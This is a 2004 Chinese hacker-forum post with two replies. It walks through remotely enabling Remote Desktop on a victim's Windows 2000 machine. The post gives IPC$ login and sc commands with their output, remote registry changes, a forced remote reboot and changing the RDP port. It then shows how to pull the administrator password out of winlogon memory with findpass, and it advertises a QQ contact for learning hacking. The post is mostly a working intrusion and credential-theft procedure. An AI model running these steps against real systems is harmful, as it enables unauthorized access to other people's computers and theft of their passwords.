|
![]() | 作者: makehacker [makehacker]
![]() |
登录 |
这种方法挺管用的,大家有兴趣可以研究研究哦, 首先喝口茶,,,, ~~~~~~ 利用工具开3389,我就不想多说了,这样开没多大技术性,这里我主要介绍不用任何工具开3389的两种方法。 1,利用SC开启对方终端服务 首先先辨别对方是不是2000SERVER,可以用小容CCA看对方的用户,如果有TsInternetUser这个用户,9成为SERVER, C:>cca \192.168.0.29 dudu dancewithsnow Check Clone Account, by netXeyes 2002/04/29 Written by netXeyes 2002, dansnow@21cn.com Connect 192.168.0.29 ....OK Prepairing ....OK Processing ....OK Checking .... Check Result: [DuDu] AS SAME AS [administrator] [Guest] AS SAME AS [administrator] [IUSR_RONG] AS SAME AS [administrator] [IWAM_RONG] AS SAME AS [administrator] [TEST] AS SAME AS [administrator] [xr] AS SAME AS [administrator] 很明显这个不是SERVER,接着看使例: C:>net use \xxx.xxx.xxx.xxxipc$ "password" /user:"name" 第一步,检查对方是否真的禁用了Terminal server C:>sc \xxx.xxx.xxx.xxx qc termservice [SC] GetServiceConfig SUCCESS SERVICE_NAME: termservice TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 4 DISABLED ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:WINNTSystem32termsrv.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Terminal Services DEPENDENCIES : SERVICE_START_NAME : LocalSystem 仔细看 START_TYPE一项,显示对方该服务的启动模式为“DISABLED”也就是“禁用”。 第二步,更改对方终端服务的启动模式 C:>sc \xxx.xxx.xxx.xxx config termservice start= auto [SC] ChangeServiceConfig SUCCESS 好了,现在我们已经把对方终端服务的启动模式修改成自动了。 第三步,再检查一便对方终端服务的启动模式 C:>sc \TEST qc termservice [SC] GetServiceConfig SUCCESS SERVICE_NAME: termservice TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:WINNTSystem32termsrv.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Terminal Services DEPENDENCIES : SERVICE_START_NAME : LocalSystem 仔细看 START_TYPE一项,显示对方该服务的启动模式为“AUTO_START”也就是“自动”。 OK 第四步,启动对方的终端服务 C:>sc \xxx.xxx.xxx.xxx start termservice SERVICE_NAME: termservice TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x1 WAIT_HINT : 0x7530 C:>sc \xxx.xxx.xxx.xxx query termservice SERVICE_NAME: termservice TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 到这里,对方的3389就在命令行下被启动了。 2,用远程修改注册表 首先打开注册表,注册表―连接网络注册表(前提是先跟对方建立空连接)找到并改为下列的值, [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionnetcache] "Enabled"="0" [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] "ShutdownWithoutLogon"="0" [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller] "EnableAdminTSRemote"=dword:00000001 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] "TSEnabled"=dword:00000001 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] "Start"=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService] "Start"=dword:00000002 [HKEY_USERS.DEFAULTKeyboard LayoutToggle] "Hotkey"="1" 接着输入: shutdown \xxx.xxx.xxx.xxx -r 对方重起后,3389服务就开了。 四,进入后该做的事 1,首先是改3389端口了,修改服务器端的端口设置,注册表有2个地方需要修改 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp] PortNumber值,默认是3389,修改成所希望的端口,比如6000 第二个地方: [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] PortNumber值,默认是3389,修改成所希望的端口,比如6000 现在这样就可以了。重启系统就可以了. 注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStations<connection> <connection>表示具体的某个RDP-TCP连结。 也可以下载这个小程序更改 http://www.haowawa.com/down.c3389.zip 格式为 c3389 port 改完以后重起就生效了,这时在登陆器里IP:你改的端口,就可以登陆了。 2,得到一个安全帐号,什么帐号最安全?当然是管理员的帐号,这里可以用FINDPASS和牛族NT/2000/XP密码大盗,由于后者我已经多次讲过,所以这次我讲讲怎么用FINDPASS得到管理员帐号,到小凤居下载后,包里会有两个文件:findpass和pulist这两个文件,很明显这两个文件要一起用。 首先运行PULIST,找到winlogon.exe后面的PID的值,这里为204,记下来,再找到administrator所在的域,这里为SHUANGFENGAdministrator,接着运行findpass,格式为: findpass 机器名称 用户名称 WinLogon的PID 我们就输入:findpass shuangfeng administrator 204 回车后,找到这一行 The logon information is: SHUANGFENG/Administrator/5201314 5201314就是密码了 想学黑客技术的请加俺的QQ:360197717 |
地主 发表时间: 04-10-09 23:32 |
![]() | 回复: xingyun [xingyun] ![]() |
登录 |
好复杂哦 |
B1层 发表时间: 04-10-10 11:50 |
![]() | 回复: hackerjune [hackerjune] ![]() |
登录 |
你说我该不该顶呢? 在网上多的是的文章,实际能用的有多少? |
B2层 发表时间: 04-10-10 12:31 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号